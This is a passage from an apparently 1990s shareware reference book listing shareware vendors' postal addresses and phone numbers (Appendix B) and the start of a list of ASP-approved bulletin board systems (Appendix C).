23234-7278 + Phone: 804-768-0420 + + DataMatta + Address: 386 North Main St, Woonsocket RI 02895-2003 + Phone: 401-766-8571 + + Derrick's Software Choices + Address: Box 315, Bruno SK S0K 0S0 CANADA + Phone: 306-369-4116 + + Diemme Editori Srl + Address: Via PO 7, RENDE COSENZA 87030 ITALY + Phone: 039-984-466800 + + Digital Expressions Inc + Address: 2107-B Powers Ferry Road, Marietta GA 30067 + Phone: 404-577-4914 + + Digital Impact Inc + Address: 6506 South Lewis Ste 250, Tulsa OK 74136 + Phone: 918-742-2022 + + Direct Original Software Inc. + Address: 30439 CENTER RIDGE ROAD, WESTLAKE OH 44145 + Phone: 216-871-0027 + + Direct Software Distribution + Address: 120 Poplar Dr, Douglassville PA 19518 + Phone: 610-385-7211 + + Dispro Software Ltda. + Address: AV. PAULISTA, 2073-11 ANDAR, CJ 1101 - ED. HORSA I, + SAO PAULO SP 01395-900 BRASIL + Phone: 251 2344 + + Appendix B, "Vendor addresses" 789 + + + + Domainsoft + Address: 8 Bonus Court, Werribee VICTORIA 3030 AUSTRALIA + Phone: 61 3 741 8613 + + DOSgg ProgrammaTheek + Address: Bremlaan 14, Rhenen 3911 XH NETHERLANDS + Phone: 31 8376 17429 + + DP Tool Club + Address: 99 Rue Parmentier, Villeneuve D'Ascq F-59493 FRANCE + Phone: 33-2084-5533 + + DTP Studio spol. sr.o. + Address: Nademlejnska 7, Prague 9 19800 CZECH REP + Phone: 42-2-862931 + + Eagle Shareware + Address: 2345 MOORPARK WAY, HENDERSON NV 89014-3630 + Phone: 702-434-4791 + + Easy Life Inc + Address: 4604 Deerfield Circle, Sioux Falls SD 57105 + Phone: 605-339-2430 + + Edensoft Limited + Address: Rm 15, 7/F Goldfield Industrial Cen, 1 Sui Wo Road, Fo + Tan SHATIN HONG KONG + Phone: 852-687-1135 + + En Linea + Address: Tenancingo No 428 Col Mitras Centro, Monterrey NUEVO + LEON 64460 MEXICO + Phone: 91 83 467505 + + Encode Business Systems Inc + Address: 434 West St North, Orillia ON L3V 5E8 CANADA + Phone: 705-327-7628 + + Eracom Sdn. Bhd. + Address: 35A, Jalan Jejaka 9, Taman Maluri, Kuala Lumpur 55100 + MALAYSIA + Phone: 603-9853108 + + Estudio Shareware + Address: Av. Rivadavia 5040 Local 21, 1424 Capital Federal + ARGENTINA + Phone: 541-903-7310 + + Excel-nt Software + Address: 714 Maple, Midland MI 48640 + Phone: 517-839-7348 + + Appendix B, "Vendor addresses" 790 + + + + Extrabyte Sdn.Bhd + Address: 2 Jalan SS21/8, Damansara Utama, Petaling Jaya + SELANGOR 47400 MALAYSIA + Phone: 03 718-3527 + + EZ Software + Address: PO Box 609, Krum TX 76249 + Phone: 214-241-2161 X333 + + Falsoft Inc - Software Shopper + Address: PO Box 385, Prospect KY 40059 + Phone: 502-228-4492 + + First Computer Centre + Address: Unit 3 Armley Park Court, Stanningley Rd, Leeds + YORKSHIRE LS12 2AE U.K. + Phone: 44-532-311536 + + Farrell, Claire + Address: PO Box 2542, Dartmouth NS B2W 4B7 CANADA + Phone: 902-462-4453 + + Friendware SL + Address: Rafael Calvo, 40, 28010 Madrid SPAIN + Phone: 308-3446 + + Fugue Software + Address: 20 Arundel St, Alexandra Hills QLD 4161 AUSTRALIA + Phone: 61-7-824-2843 + + G & J Technologies + Address: 2706 Rose Blvd, Orlando FL 32839 + Phone: 407-855-7080 + + Gamebox c/o Galcom + Address: Hardturmstr 169, Zurich 8005 SWITZERLAND + Phone: 41-1444-26-44 + + Gem Shareware Software + Address: 433 Highwood Dr, Slidell LA 70458-1708 + Phone: 504-649-9777 + + Gunzameory Computer Institute + Address: Yoido PO Box 392, Yongdungpo-ku, Seoul KOREA + Phone: 822-714-7539 + + H & J Software + Address: 311 Marlow Court, Chesapeake VA 23320 + Phone: 804-482-5798 + + Halpenny Sales + Address: 23275 Friendship Road, Pilot Point TX 76258-9241 + Phone: 817-440-2995 + + Appendix B, "Vendor addresses" 791 + + + + Hamilton New Media + Address: 327 Ouachita Avenue, Hot Spring AR 71901 + Phone: 501-321-2208 + + Hamsoft Shareware Library + Address: 580 Lowe Street, Hastings 4201 NEW ZEALAND + Phone: 64-6-876-9808 + + Hill Computer Goodies + Address: Eastland Mall, North Versailles PA 15137 + Phone: 412-678-8003 + + Hillsoft + Address: PO BOX 16, VRIEZENVEEN 7670 AA HOLLAND + Phone: 0 5498 59599 + + Hourglass Software + Address: 20231 Oak River Ct, Matoaco VA 23803 + Phone: 804-590-9041 + + HRS Software Club + Address: 10 Tangmere Crescent, Markham ON L3R 6Y9 CANADA + Phone: 905-477-4144 + + Husco Austria Handelsgesellshcaft m.b.H. + Address: Bosendorferstrasse 4, VIENNA 1010 Wien AUSTRIA + Phone: 431/505 43 11 + + IkeaMo Enterprises + Address: 0255 W 300 N, Howe IN 46746-9618 + Phone: 219-463-5246 + + Independent Micro Consulting (IMC) + Address: 134 Upland Drive, MEDICINE HAT ALBERTA T1A 3N7 CANADA + Phone: 403-527-2826 + + Info-Soft + Address: 825 Belvedere sud Bureau 100, Sherbrooke PQ J1H 4B9 + CANADA + Phone: 819-564-6673 + + International Market, MCCA + Address: PO Box 41, Madisonville TX 77864-041 + Phone: 409-348-6963 + + J and J Software + Address: 1323 McGuire, Jackson MI 49202 + Phone: 517-787-5852 + + Jamtec + Address: Unit 21, 27 Rickard Road, Bankstown NSW 2000 AUSTRALIA + Phone: 61 2 7072924 + + Appendix B, "Vendor addresses" 792 + + + + JCS Marketing, Inc + Address: PO Box 1216, Lakeville MN 55044 + Phone: 612-469-5898 + + Jim - Tech Enterprises + Address: PO Box 659, Fraser Lake BC VOJ 1SO CANADA + Phone: 604-699-8650 + + Jimaz + Address: HERMANOVA 37, PRAHA 7 170 00 CZECHOSLOVAK + Phone: 422379498 + + JonDan Computers + Address: 10 Riveraum Drive, Burpengary QUEENSLAND 4505 + AUSTRALIA + Phone: 61 7 886-6687 + + Joshua Advanced Data Systems Ltd Oy + Address: PO Box 63, Tykistokatu 4D,DIO, Turku 20521 FINLAND + Phone: 358-21-6375754 + + K & M + Address: Van Diemenstraat 88, 1013 CN Amsterdam NETHERLANDS + Phone: 31-20-6385509 + + K & M Software + Address: PO BOX 156, Elsberry MO 63343 + Phone: 314-898-5300 + + K Graphics + Address: RDH Box 675 Tanger Avenue, Franklinville NJ 08322 + Phone: 609-728-4839 + + Kelly Data GmbH + Address: Lena-Christ-Stre 50, Martinsried D-82152 GERMANY + + Kelstar-1 Software + Address: PO Box 2403, Bartlesville OK 74005-2403 + Phone: 918-333-5834 + + Kurt Mitchell Enterprises, Inc + Address: 100 BROADWAY BOX 156, LYNBROOK NY 11563 + Phone: 517-887-9610 + + KWN Systems Inc + Address: 220 Stonehurst Blvd, FREEHOLD NJ 07728 + Phone: 800-245-9399 + + Lady-J Software + Address: PO Box 6079, Auburn CA 95604 + Phone: 916-887-1104 + + Appendix B, "Vendor addresses" 793 + + + + Laservend, Inc + Address: 12215 S 900 E, Draper UT 84020-9715 + Phone: 801-553-9080 + + Lavonia Trading Ltd + Address: Residenta S1, CH-6528, Camorino CH SWITZERLAND + Phone: 0041-91-508820 + + Lewis Enterprises + Address: 2913 Lindbrook Dr., Riverbank CA 95367 + Phone: 209-869-4000 + + Lilliput Shareware Distribution + Address: 3-26-2 MINAMI, SATTE CITY SAITAMA PREF. 340-01 JAPAN + Phone: 81-480-43-6225 + + Limelight ublishing + Address: 2718 Rand Road, Indianapolis IN 46241 + Phone: 317-487-8800 X200 + + Logiciels Nifty Softwares + Address: 73 Place Mercier # 201, CANDIAC QUEBEC J5R 4V9 + CANADA + Phone: 514-635-6052 + + LT-1 Enterrpises Inc + Address: 118 West Washington St, MARENGO IL 60152 + Phone: 815-568-7000 + + Ludi-Part + Address: Halen 61, CH - 3037 HERRENSCHWANDEN Switzerland + Phone: 41-31-302-8137 + + Luna Tech + Address: 212 North Ave, Haverhill MA 02830 + Phone: 508-374-2673 + + M & M Computing + Address: 43 Maple Street, Newburgh NY 12550 + Phone: 914-569-0510 + + M & M Software + Address: 3252 Los Coyotes Drag, Long Beach CA 90815 + Phone: 310-420-2655 + + M.A.D. Shareware + Address: 1542 Live Oak Dr, Silver Spring MD 20910 + Phone: 301-587-0545 + + Magic Stone Co LTD + Address: PO Box 48-542, TAIPEI TAIWAN REP OF CHINA + Phone: 8862752211 + + Appendix B, "Vendor addresses" 794 + + + + Main Gate Enterprises Inc + Address: 5448 Hoffner Avenue Suite 407, ORLANDO FL 32812 + Phone: 407-380-9313 + + Manaccom (S.A) + Address: 93A Kensington Road, Norwood ADELAIDE 5067 AUSTRALIA + Phone: 61 8 364 2753 + + Manaccom Pty Ltd + Address: 3/9 Camford Street, Milton 4064 QLD AUSTRALIA + Phone: 617-368-2366 + + Mantis d.o.o. + Address: Reboljeva 11, PO BOX 55, LJUBLJANA 61113 SLOVENIA + Phone: 38 61 340 664 + + MaryKay Software + Address: 5142 N State Rd, Alma MI 48801 + Phone: 517-561-2682 + + Masled Informatica + Address: Via Degzi Oleandri, 68, 04011 Aprilia (LT) ITALY + Phone: 319 6 9275638 + + MediaLand, Inc. + Address: 41 Bentworth Crescent, Nepean ON K2G 3X1 CANADA + Phone: 613-828-6711 + + MegaByte(Shareware) U.K. + Address: 90 Cameron Way, Knightsridge, Livingston WEST LOTHIAN + EH54 8HF U.K. + Phone: 0506-441384 + + MEI/Micro Center + Address: 1555 West Lane Avenue, COLUMBUS OH 43235 + Phone: 614-481-4425 + + Micom Data Services Inc + Address: 10345 Highway 78, Summerville SC 29483 + Phone: 803-821-9282 + + Micro Star + Address: 2245 Camino Vida Roble, Carlsbad CA 92009-1502 + Phone: 619-931-4949 + + Microbyte Sytems Inc + Address: 1457 E Palatine Rd, Arlington Heights IL 60004 + Phone: 708-349-0555 + + MicroData Computer Services + Address: 6510 Parkland Ave, Brook Park OH 44142 + Phone: 216-843-2662 + + Appendix B, "Vendor addresses" 795 + + + + Microforum Mfg Inc + Address: 1 Woodborough Ave, Toronto ON M6M 5A1 CANADA + Phone: 416-656-6406 + + Microlane + Address: PL 59, Ikaalinen 39501 FINLAND + Phone: 950-5116251 + + Microsolve Technologies + Address: 2C D'Arcy Business Centre, Llandarc, Neath SA10 6EJ + U.K. + Phone: 441792321270 + + Middle East Information Group + Address: Rehov Oved 8, Abu-Tor Jerusalem 93551 ISRAEL + Phone: 02-731-443 + + Miller's Computers + Address: 5791 LIBRARY ROAD, BETHEL PARK PA 15102 + Phone: 412-854-2022 + + Mobbley's Computers + Address: 6260 Thorold Stone Rd, Niagara Falls ON L2J 1AF CANADA + Phone: 905-354-2339 + + Mom 'N' Pop's Software + Address: 3431 Dow Lane, Spring Hill FL 34609 + Phone: 904-688-9108 + + Monster Media Inc + Address: 2331 Ardmore Ave, Royal Oak MI 48073-3601 + Phone: 810-547-8160 + + Morrison Wallaace + Address: Suite 1, 15 Grosvenor St, NEUTRAL BAY NSW 2089 + AUSTRALIA + Phone: 02 9539332 + + Most Significant Bits + Address: 37207 Colorado Ave, Avon OH 44011-1527 + Phone: 216-221-6665 + + Mountain of Shareware + Address: , 7105 George Ct, Wooster OH 44691 + Phone: 216-345-6825 + + Mr Disk Software + Address: 5915 Casey Drive, PO Box 59012, Knoxville TN 37909 + Phone: 615-584-3952 + + Nane Juergensen + Address: Nordergraben 26, 24937 Flensburg GERMANY + Phone: 49-4961-18-23-40 + + Appendix B, "Vendor addresses" 796 + + + + Neon Publishing Inc + Address: 14220 Carlson Circle, Tampa FL 33626 + Phone: 813-854-5515 + + New Horizons Enterprise + Address: 7 Yardarm Court, Greensboro NC 27455 + Phone: 910-282-8060 + + News Software Gmbh + Address: Birkenstr. 42, DUSSELDORF 40233 GERMANY + Phone: 211-676-201 + + Night Owl's Publisher Inc. + Address: 1611 Falconer Stillwater RD, Jamestown NY 14701 + Phone: 716-484-3066 + + NovaWare, Inc. + Address: 7477 Stanford, St Louis MO 63130 + Phone: 314-862-6311 + + On Disk + Address: 4227 Chambers St, Cincinnati OH 45223 + Phone: 513-541-2675 + + OWOBOPTE Industries Inc + Address: 3101 Sibley Memorial Hwy, Eagan MN 55121 + Phone: 612-686-0405 + + P & A Co., Ltd + Address: 302 BELLWINS 1367-23, NAKAGAMI, AKISHIMA, TOKYO 196 + JAPAN + Phone: 81 425-46-9141 + + P.D.(&Shareware)Software Library + Address: Winscombe House, Beacon Rd, Crowborough Sussex TN6 + 1UL U.K. + Phone: 0892-663298 + + P.R.O. Shareware + Address: 30 Blounts Drive, Uttoxeter, Staffordshire ST14 8TQ + U.K. + Phone: 0585 171803 + + Paradise Shareware + Address: 960 W San Marlos Blvd Ste 2-D, San Marcos CA 92069 + Phone: 619-591-4175 + + PC Independent User Group + Address: 87 High Street, Tonbridge Kent TN9 1RX U.K. + Phone: 0732-771512 + + PC Productivity, Inc. + Address: 5777 Riverside Dr, Cape Coral FL 33904 + Phone: 813-542-6079 + + Appendix B, "Vendor addresses" 797 + + + + PC-Klubben Danmark + Address: Ormslevvej 20, Viby J 8260 Denmark + Phone: 45-86110600 + + PCDisk + Address: PO Box 10627, Killeen TX 76547-0627 + Phone: 817-526-2383 + + PD Software Services P/L + Address: 8 BENTLEY ST, WANTIRNA 3152 AUSTRALIA + Phone: 03-729-9534 + + Pearl America Inc + Address: 4824 California Ave SW, Seattle WA 98116 + Phone: 206-938-0336 + + Pee Sea Shareware + Address: 4310 UTAH STREET, SAN DIEGO CA 92116 + Phone: 619-282-8058 + + Pennant Enterprises Inc + Address: 4207 Elmhurst, Toledo OH 43613 + Phone: 419-473-0875 + + Personal Computer Services + Address: 14 Crawford Street, Dunedin 9011 NEW ZEALAND + Phone: 064-03-4777-288 + + Phillips Software + Address: 21 Caudle Avenue, Lakenheath SUFFOLK 1P27 9AV ENGLAND + Phone: 01-842-860247 + + Pik A Program + Address: 13 St. Marks Place, New York NY 10003 + Phone: 212-598-4459 + + Pointsoft + Address: 111 Rue De Croix, HEM 59510 FRANCE + Phone: 33-20-81-25-25 + + Politiken + Address: Raadhuspladsen 37, COPENHAGEN 1785 V DENMARK + Phone: 45 33 11 85 11 + + Positronic Software + Address: PO Box 122, Fillmore SK 50G 1N0 CANADA + Phone: 306-722-3225 + + Power User + Address: 3205 Hazel St, Erie PA 16508 + Phone: 814-454-0234 + + Appendix B, "Vendor addresses" 798 + + + + Prime Soft, W. Willaredt + Address: Bahnhofstraase 7, CH-8157 Dielsdorf SWITZERLAND + Phone: 41-1-854-0374 + + Printers Shareware + Address: 5019-5021 West Lovers Lane, Dallas TX 75209 + Phone: 214-350-5353 + + Pro Soft + Address: 4 Benloese Skel 4G, RINGSTED DK-4100 DENMARK + Phone: 45 53619042 + + Pro-Line Software + Address: PO BOX 2416, CLIFTON NJ 07015 + Phone: 201-546-2550 + + Professional Systems Group, LTD. + Address: 210 Woodgate Dr S #D, Brandon MS 39042-2424 + Phone: 601-936-4866 + + Chang, Steven + Address: 7F-2 No.234, Nanking East Rd Sec 5, Taipei TAIWAN + Phone: 886-2-7468626 + + Public (software) Library + Address: PO BOX 35705, Houston TX 77235-5705 + Phone: 713-524-6394 + + Public Brand Software + Address: 25 First Street, Cambridge MA 02141 + Phone: 617-252-5533 + + Quantum Axcess + th + Address: 240 N 5 St Ste 330, Columbus OH 43215 + Phone: 614-228-3903 + + Quantum Computers + Address: PO Box 49, North Highlands CA 95660-0049 + Phone: 916-331-2369 + + R & K Software + Address: 2165 Salem Avenue N, St Petersburg FL 33714-4139 + Phone: 813-526-8713 + + R.F. South Pacific Shareware + Address: 27 Chester Ave, Baulkham Hills NSW 2153 AUSTRALIA + Phone: 02-624-5205 + + R.O.I. Software Distributing + Address: 981 Wellington Road South Ste 141, London ON N6E 3A9 + CANADA + Phone: 519-642-3522 + + Appendix B, "Vendor addresses" 799 + + + + RabbitWare + Address: PO Box 232, Berowra NSW 2081 AUSTRALIA + Phone: 61 043 891699 + + Radical Concepts + th + Address: 516 36 St, Newport Beach CA 92663 + Phone: 714-723-4351 + + Reasonable Solutions, Inc + Address: 1221 Disk Dr, Medford OR 97501 + Phone: 503-776-5777 + + Red River CDs + Address: 622 S Central, Idabel OK 74745-0286 + Phone: 405-286-7791 + + SAS Software + Address: PO Box 104375 Station B, Howard Beach NY 11414 + Phone: 718-848-0301 + + Sat-Tech Systems + Address: 97 Sydney Road Brunswick, Melbourne VIC 3056 AUSTRALIA + Phone: 03-329-9255 + + SBD Software + Address: 109 E Kentucky St, Franklin KY 42134-1837 + Phone: 502-746-9140 + + Seltec NZ (1993) Ltd. + Address: 83B Buxton Square, PO Box 943, NELSON 7015 NEW ZEALAND + Phone: 03 548-4622 + + Share Warehouse Limited + Address: 18 Colchester Cres, Newlands, Wellington 6004 New + Zealand + Phone: 64-04-477-3535 + + Sharemart + Address: 105 Summer St, Foxboro MA 02035-3037 + Phone: 617-769-9063 + + Shareware + Address: PO Box 7037, Long Beach CA 90807-0037 + Phone: 310-499-1262 + + ShareWare City + Address: 621 Snowball Road, Monroeville PA 15146-1229 + Phone: 412-373-6572 + + Shareware Depot + Address: 2077 W. 76 STREET, HIALEAH FL 33016 + Phone: 305-822-0122 + + Appendix B, "Vendor addresses" 800 + + + + Shareware Distributie Nederland + Address: M.L. Kinglaan 51, Haarlem 2037 RK NETHERLANDS' + Phone: 31-23-338-651 + + Shareware Express + Address: 1908 ASHLAND STREET #D, ASHLAND OR 97520 + Phone: 503-482-5136 + + Shareware Express+ + Address: 7333 Cedar Creek Ct, Winter Park FL 32792-6567 + Phone: 407-348-8486 + + Shareware Hot Picks + Address: PO Box 51 o, Lake Elmo MN + 55042-0051 + Phone: 612-777-5153 + + Shareware Marketing (M) Sdn Bhd + Address: 9A Lintang Angsana, Bandar Baru, Ayer Itam, Penang + PENANG 11500 MALAYSIA + Phone: 604-8261181 + + Shareware Source + Address: 41 Blythewood Drive, Greenville SC 29607 + Phone: 803-232-7102 + + Shareware Technology Ltd + Address: Block B,14/F Sai Wan Ho Plaza, 66-68 Shaukeiwan Rd, + HONG KONG + Phone: 852-539-6897 + + Shareware Testing Laboratories + Address: PO Box 11499, Indianapolis IN 46201-0499 + Phone: 317-322-2000 + + Shareware To Go + Address: PO Box 31303, Raleigh NC 27622-1303 + Phone: 800-277-DISK + + Shareware Unlimited Etc + Address: 5225 Canyon Crest Dr #71-315, Riverside CA 92507 + Phone: 909-789-2336 + + Shareware World + Address: PO Box 757, Seven Hills NSW 2147 AUSTRALIA + Phone: 61 2 671-6647 + + Shareware, Etc. + Address: 112 Wilson Street Apt 108, Durant OK 74701-3503 + Phone: 918-543-6143 + + Shareware-Elite + Address: 25 Cades Park, Helston Cornwall TR13 8QS U.K. + Phone: 01326-564164 + + Appendix B, "Vendor addresses" 801 + + + + Sharewareservice M Birr + Address: Heuweg 4 PO Box 1629, 21497 Geesthacht GERMANY + Phone: XX49 X4152 76055 + + Simply Software Ltd + Address: PO Box 1391, Greenwood NS BOP 1NO CANADA + Phone: 902-765-2534 + + Sitelsa + Address: Via Augusta 186, Barcelona 08021 SPAIN + Phone: 34 34140192 + + Skip's Shareware Selections + Address: C/O 4604B Northland Place, Courtenay BC V9N 8Y5 CANADA + + Slash K Software + Address: 3661 N Campbell Ave Ste #201, Tucson AZ 85719 + Phone: 520-747-1521 + + SMM Software GmbH + Address: Hermann-Lons-Str. 12, 55254 Budenheim GERMANY + Phone: 01149 6139 916-916 + + SMS Shareware + Address: 19 Carshalton Road, Camberley SURREY GU15 4AQ U.K. + Phone: 44 276 681864 + + Softdesign Concepts Company + Address: PO Box 392, MECHANICSBURG PA 17055 + Phone: 717-795-9583 + + Softline + Address: PO BOX 587, Heddal Notodden N-3671 Norway + Phone: 473620966 + + SoftMarket S.A. + Address: Lincoyan 1040, Santiago CHILE + Phone: 562-3413083 + + SoftMate GmbH + Address: Kapfenburgstrasse 74, STUTTGART 70469 GERMANY + Phone: 0049 711 85977-0 + + Software & Hardware + Address: CALLE COTLLIVRE, 26-6-B, PALMA BALEARES 07010 SPAIN + Phone: 971-290463 + + Software Concepts + Address: 3130 N. Arazona Ave., Suite 105, Chandler AZ 85224 + Phone: 602-545-9321 + + Software Heaven (Australia) Pty Ltd + Address: 658 Pittwater Rd, Brookvale NSW 2100 AUSTRALIA + Phone: 61-2-905-7006 + + Appendix B, "Vendor addresses" 802 + + + + Software of the Month Club + Address: 5816 Dryden Place, Carlsbad CA 92008 + Phone: 619-931-8111 + + Solvit Chosun Media Inc + Address: 748-16 Namchang B/D, Yeoksam-Dong Kangnam-Gu, Seoul + KOREA + Phone: 82-2-561-0361 + + Spartan Software Marketing + Address: 170 Jarvis Rd, Inman SC 29349-7680 + Phone: 803-574-0437 + + Spearwood Shareware Service + Address: PO Box 1212, Bibra Lake WEST AUSTRALIA 6163 AUSTRALIA + Phone: 011 61-9-434-3416 + + Spotlight Software Inc + Address: 957 S Glendale St, Wichita KS 67218 + Phone: 316-683-4949 + + Squirrel Shareware + Address: HCR 63 Box 37 B, Cadosia NY 13783 + Phone: 607-637-5300 + + STG Computers LTD + Address: 630 Kipling Avenue, Etobicoke ON M8Z 5S2 Canada + Phone: 416-251-9777 + + StreetSmart Software + Address: 1001 Mason Drive, Hartselle AL 35640 + Phone: 205-773-4024 + + Sunshine Software + th + Address: 8801 N.E. 59 Street, Vancouver WA 98662 + Phone: 360-254-3511 + + Super Software Limited + Address: PO Box 34 145, Auckland NEW ZEALAND + Phone: 64-9-418-0577 + + Svenska PC Klubben + Address: PO Box 125, 421 22 Vastra Frolun SWEDEN + Phone: 46-320-16500 + + Swarland Computer Graphics + Address: 2 Coast View, Swarland, Morpeth NORTHUMBERLAND NE65 + 9JG U.K. + Phone: 44-670-787912 + + Systems Comunicazioni SRL + Address: v Olanda 6, Gaggiano 20083 ITALY + Phone: 39-2-90841814 + + Appendix B, "Vendor addresses" 803 + + + + T'gus + Address: 8980 Underwood Ln N, Maple Grove MN 55369-6717 + Phone: 612-420-6469 + + Target Industries Singapore Pte Ltd + Address: 5006 Ang Mo Kio Ave 5, Singapore 2056 SINGAPORE + Phone: 65-4815422 + + Tech Now + Address: 77 Plymouth Ave, East Wareham MA 02538 + Phone: 508-295-2339 + + Temwa Data Aps + Address: Grumstrupues 35, 8730 Hovedgaard DENMARK + Phone: 45-7566-2611 + + The Cobb Group + Address: 9420 Bunsen Parkway, Louisville KY 40220 + Phone: 502-493-3428 + + the Digital Publishing Company + Address: 6271 Edgemont Blvd #b, Minneapolis MN 55428-2654 + Phone: 612-531-9881 + + The Game Grid + Address: 1907 Twain Place, Placentia CA 92670 + Phone: 714-528-7358 + + The Hi-Tech Marketplace + Address: 3 Vernon Street, Parlin NJ 08859 + Phone: 908-525-2581 + + The Shareware Shoppe + Address: PO Box 454, Ferndale NY 12734 + Phone: 914-292-1574 + + The Simple Series + Address: PO BOX 1167, PLAISTOW NH 03865-1167 + Phone: 603-362-5792 + + The Software House + Address: PO Box 27054, Jerusalem 91270 ISRAEL + Phone: 972 2 830001 + + Theresia Blaecker + Address: Auf der Harre 13, Edewecht Jeddeloh I D-26188 GERMANY + Phone: 49 044 057229 + + Totronik + Address: Rotebuehlstrasse 85, D-70178 Stuttgart WEST GERMANY + Phone: 711-6271980 + + Appendix B, "Vendor addresses" 804 + + + + TRAX + Address: STEENSTRAAT 61, Zedelgem-Aartrijke BELGIUM 8211 EUROPE + Phone: 32-50-20-07-35 + + Trip Software + Address: PO Box 65534, Dundas Postal Outlet, Dundas ON L9H 6Y6 + CANADA + Phone: 905-628-3356 + + Tryware + Address: 42 Churchill Road, Ovingham SA 5082 AUSTRALIA + Phone: 618-269-1108 + + Ultimax + th + Address: 167 100 Ave, Montreal QU H1A 2B6 CANADA + Phone: 514-644-1809 + + Universal Software + Address: 5525 Lorelei Avenue, Lakewood CA 90712 + Phone: 310-866-1274 + + ValueWare + Address: 130 W End Ave, Knoxville TN 37922-2822 + Phone: 615-675-7958 + + Vertical Publishing Corp + Address: One Vertical Dr #C, Canonsburg PA 15317 + Phone: 412-746-4247 + + Videoflicks Canada Limited + Address: 1654 Avenue Road, Toronto ON M5M 3Y1 CANADA + Phone: 416-782-4438 + + Village Center, Inc. + Address: SunLight Bldg 6F, 3-2 Jinbo-Cho, Kanda, Chiyoda-Ward + TOKYO 101 JAPAN + Phone: 81-3-3221-3525 + + Wayne's Shareware + Address: 5116-B S General Bruce Dr, Temple TX 76502 + Phone: 817 899-1161 + + White Roe-Shareware + Address: Fairview Mall PO Box 55191, 1800 Sheppard Ave East, + North York ON M2J 5B9 CANADA + Phone: 416-490-1559 + + Willard Computer Services + Address: 276 W. Bagley Road #201, Berea OH 44017-1864 + Phone: 216-891-1190 + + Appendix B, "Vendor addresses" 805 + + + + Williams Software Corporation + Address: 14761 Pearl Road Ste 309, PO Box 360888, Strongsville + OH 44136 + Phone: 216-225-2340 + + WindowShare + Address: 32,rue des Frieres, B.P. 2078 57051-METZ cedex 2 + FRANCE + Phone: 87 30 85 57 + + Wiz Technology Inc + Address: 32951 Calle Perfecto, San Juan Capistrano CA 92675 + Phone: 714-443-3000 + + Appendix C, "Bulletin Boards" 806 + + + + + + Appendix C + Bulletin Boards + + This appendix lists each ASP-approved computer bulletin board + system (BBS). These BBSs have agreed to abide by ethical stan- + dards when offering shareware. + + Set your communications software to "8 data bits, no parity, 1 + stop bit" before calling any of these BBSs. + + + $ensible $oftware BBS + Address: 1840 Cleek Ct., Orlando Fl 32835 + BBS Phone: 407-298-5830 + + **CCAT** + Address: 11326 DEW CREEK CIRCLE, CORPUS CHRISTI TX 78410 + BBS Phone: 512-242-2206 + + /\ssisT-ON-Line + Address: c/o DaS Procuction, Via Giusti 15 a/b, Firenze 50121 + ITALY + BBS Phone: 39-55-2340486 + th + 24 Street Exchange + st + Address: 1507 21 Street Suite 107, Sacramento CA 95814 + BBS Phone: 916-448-2483 + + A Community BBS + Address: 317 E Palm, Monrovia CA 91016 + BBS Phone: 818-358-3811 + + A to Z Tech Line + th + Address: 21024 SE 269 , Kent WA 98042 + BBS Phone: 206-432-4732 + + Access BBS + Address: PO Box 373, Ballston Spa NY 12020 + BBS Phone: 518-885-4192 + + Ace-Station- BBS + Address: 9401 Orion Ave, North Hills CA 91343 + BBS Phone: 818-891-0397 + + Active-Net BBS + Address: Eschenweg 4, JONA 8645 SWITZERLAND + BBS Phone: 41-55-261-815 + + Appendix C, "Bulletin Boards" 807 + + + + Acumen BBS + Address: 632 Simpson St, Thunder Bay ON P7C 3J7 CANADA + BBS Phone: 807-626-9339 + + Adams Dynamic Storefront + Address: PO Box 787, Herndon VA 22070-0787 + BBS Phone: 703-716-1256 + + Advantage On-Line Business + Address: 16498 Howard Dr, Macomb MI 48042-5785 + BBS Phone: 810-781-8601 + + AIS MULTILINE + Address: 16 A 11th Ave S, Cranbrook BC V1C 4H7 CANADA + BBS Phone: 604-489-4206 + + Alien Space Ship + Address: 623 Elm Street, Shelbyville IN 46176-2011 + + Alpha City BBS + Address: 59 Gatineau St, Oshawa ON L1H 7G2 CANADA + BBS Phone: 905-579-6302 + + AlphaOne Online + Address: 8926 N Greenwood Ave # 229, Niles IL 60714 + BBS Phone: 708-827-3619 + + Altair Data System + Address: Via Guarini Matteucci N'1, 20162 Milano Mi, ITALY + BBS Phone: 39 2 6420515 + + Alternatives PLUS, Inc + Address: PO Box 11931, Wilmington DE 19850 + BBS Phone: 302-328-0381 + + AMCOM + Address: PO BOX 41164, Cleveland OH 44141 + BBS Phone: 216-526-9480 + + America's Suggestion Box + Address: 101 Locust Blvd, Ronkonkoma NY 11779 + BBS Phone: 516-471-8625 + + Anglers Roost BBS + Address: 7105 L Rockridge Lane, Alexandria VA 22315 + BBS Phone: 703-971-4441 + + Apartment 2 + Address: PO BOX 303, Glen Oaks NY 11004-0303 + BBS Phone: 718-347-1075 + + Archives BBS + Address: 100 Nestles Lane, Acushmet MA 02743 + BBS Phone: 508-995-0085 + + Appendix C, "Bulletin Boards" 808 + + + + Argus Computerized Exchange + Address: PO Box 621, Lexington MA 02173 + BBS Phone: 617-862-9373 + + Arkansas River Valley + Address: 136 Vance Lane, Russellville AR 72801 + BBS Phone: 501-968-1931 + + Artist On-Line Info Sys + Address: Blk 458 Ang Mo Kio #14-1584, SINGAPORE 2056 SINGAPORE + BBS Phone: 65 456-1100 + + AspenWood BBS + Address: 1220 S Parker Rd #110, Denver CO 80231 + BBS Phone: 303-388-0336 + + At The GIFfer's + Address: 4577 Gunn Highway Ste 170, TAMPA FL 33624 + BBS Phone: 813-969-2761 + + At the Mountain BBS + Address: 5935 E Vermillion ST, Mesa AZ 85215 + BBS Phone: 602-981-3591 + + AT&T EasyLink Service + Address: 2800 Century Ctr Pkwy RM 510-B, Atlanta GA 30345 + BBS Phone: 800-624-5123 + + ATAB BBS + Address: PO BOX 2542, DARTMOUTH NS B2W 4B7 CANADA + BBS Phone: 902-435-0751 + + Atomic Dog BBS + Address: PO Box 523, Medford MA 02155-0004 + BBS Phone: 617-279-3561 + + Attard Communications + Address: 20 Fairway Dr, Centereach NY 11720 + BBS Phone: 800-638-8369 + + Attention to Details BBS + Address: 5085 Trail Canyon Drive, Mira Loma CA 91752-1685 + BBS Phone: 909-681-6221 + + Jorge, Antonio M. + Address: Apartado 4438, Lisboa Codex 1509 PORTUGAL + BBS Phone: 351-1-4919755 + + BBS 2000 + Address: C.so Vitt. Emanuele 15, Milano 20122 ITALY + BBS Phone: 39 2 781147 + + Appendix C, "Bulletin Boards" 809 + + + + BBS Express + Address: PO Box 4505, Santa Rosa CA 95402 + BBS Phone: 707-571-7526 + + BBS Waterland + Address: PO Box 1196, 1440 BD PURMEREND NETHERLANDS + BBS Phone: 31299040303 + + Beyond The Realm + Address: 2263 Camilar Dr, 